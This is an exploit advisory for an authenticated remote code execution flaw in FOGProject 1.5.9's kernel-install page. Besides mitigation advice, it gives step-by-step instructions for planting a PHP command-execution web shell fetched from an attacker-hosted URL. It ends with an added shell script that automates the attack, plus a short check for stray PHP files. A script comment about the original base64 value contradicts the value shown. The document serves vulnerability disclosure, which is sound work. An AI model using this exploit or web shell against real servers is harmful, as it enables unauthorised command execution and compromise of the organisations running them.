Vendor: FOGProject
By: sml@lacashita.com
CVSS: 9.8 (HIGH)
Type: Remote Code Execution
CWE: 78
Product Name: FOGProject
Affected Version From: 1.5.9
Affected Version To: 1.5.9
Patch Exists: YES
Related CWE: N/A
CPE: a:fogproject:fogproject:1.5.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian 10
Year: 2021

FOGProject 1.5.9 – File Upload RCE (Authenticated)

FOGProject 1.5.9 contains an authenticated file upload flaw in the kernel-install feature of the management console (index.php?node=about&sub=kernel). The page fetches a "kernel" from a base64-encoded URL passed in the file parameter and stores it under /fog/service/ipxe/ with a filename the user types into the Kernel Name field; neither the downloaded content nor the filename is validated. An attacker with a management login can therefore host a file that ends in PHP code, point the installer at it, name it myshell.php, click Install, and then request http://VICTIM/fog/service/ipxe/myshell.php?cmd=... to run arbitrary commands as the web server user.

Mitigation:

Upgrade to a FOGProject release newer than 1.5.9 (a patch exists, see above). Because the flaw is only reachable after logging in to the management console, also restrict network access to /fog/management/ and review who holds console accounts. On a server that ran 1.5.9, check the directory behind /fog/service/ipxe/ for files that are not kernel or initrd images, in particular anything ending in .php, and review web-server logs for requests to unexpected names under that path.

Exploit-DB raw data:

# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
# Date: 2021-04-28
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://fogproject.org
# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
# Tested on: Debian 10

On the Attacker Machine:

1) Create an empty 10 MB file (zero-filled). The installer never checks that the download is really a kernel, which is what the attack relies on.
dd if=/dev/zero of=myshell bs=10485760 count=1

2) Append your PHP code to the end of the file created in step 1.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

3) Make the "myshell" file reachable over HTTP, for example by copying it into the web root of a web server on the attacker machine.
cp myshell /var/www/html

4) Base64-encode the URL of the "myshell" file (replace ATTACKER_IP). Use printf rather than echo so that a trailing newline is not encoded along with the URL.
printf '%s' "http://ATTACKER_IP/myshell" | base64
aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbA==

5) While logged in to the FOG management console, visit
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<BASE64_MYSHELL_URL>&arch=arm64
Example:
http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbA==&arch=arm64

6) A textbox appears. Change the Kernel Name (default bzImage32) to myshell.php
and click Install.

7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname
The response contains the victim's hostname, confirming that the uploaded PHP executes.
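The attacker-side part of the procedure above, scripted as an added example (this is not code from the Exploit-DB entry or from the FOGProject project). It performs steps 1 to 4, builds the URLs for steps 5 and 7, and adds a small defender-side check for stray PHP files in the ipxe directory. Step 6 is still done in the browser, because the page does not document the form's field names. The IP addresses, the /var/www/html web root and the /var/www/fog path are placeholders; encode_url uses printf instead of echo so the trailing newline is not base64-encoded.

```shell
#!/bin/sh
# Added example, not part of the original exploit write-up.
set -e

PAD_BYTES=10485760    # 10 MiB of zeros, as in step 1
PHP_STUB='<?php $cmd=$_GET["cmd"]; system($cmd); ?>'

# Steps 1+2: zero-filled file with the PHP stub appended. Prints the total size.
make_payload() {      # $1 = output path
    dd if=/dev/zero of="$1" bs="$PAD_BYTES" count=1 2>/dev/null
    printf '%s\n' "$PHP_STUB" >> "$1"
    wc -c < "$1" | tr -d ' '
}

# Step 4: base64 of the URL itself. A plain `echo | base64` also encodes the
# newline echo appends, which is why the original value ends in "...bAo=".
encode_url() {        # $1 = URL of the hosted payload
    printf '%s' "$1" | base64 | tr -d '\n'
}

# Step 5: the vulnerable kernel-install page on the victim (needs a console login).
kernel_install_url() {   # $1 = victim host, $2 = base64 payload URL
    printf 'http://%s/fog/management/index.php?node=about&sub=kernel&file=%s&arch=arm64' "$1" "$2"
}

# Step 7: the installed "kernel" is served from the ipxe directory and runs as PHP.
shell_url() {            # $1 = victim host, $2 = kernel name from step 6, $3 = command
    printf 'http://%s/fog/service/ipxe/%s?cmd=%s' "$1" "$2" "$3"
}

# Defender check: only kernel/initrd images belong in the ipxe directory.
# Prints every .php file found directly under <fog web root>/service/ipxe.
find_php_in_ipxe() {     # $1 = fog web root on the server, e.g. /var/www/fog (assumed path)
    find "$1/service/ipxe" -maxdepth 1 -name '*.php' 2>/dev/null
}

if [ "${1:-}" = "run" ]; then
    ATTACKER_IP="${ATTACKER_IP:-192.168.1.102}"   # placeholder
    VICTIM_IP="${VICTIM_IP:-192.168.1.120}"       # placeholder
    size=$(make_payload /var/www/html/myshell)    # step 3: served by the local web server
    b64=$(encode_url "http://$ATTACKER_IP/myshell")
    echo "payload written: /var/www/html/myshell ($size bytes)"
    echo "step 5 (log in first, then open): $(kernel_install_url "$VICTIM_IP" "$b64")"
    echo "step 6: set Kernel Name to myshell.php and click Install"
    echo "step 7: curl -s '$(shell_url "$VICTIM_IP" myshell.php hostname)'"
fi
```

Run it as `sh exploit.sh run` on the attacker machine; without the `run` argument it only defines the functions, so they can be sourced and reused. On the server side, `find_php_in_ipxe /var/www/fog` returning anything is a strong indicator that this technique was used.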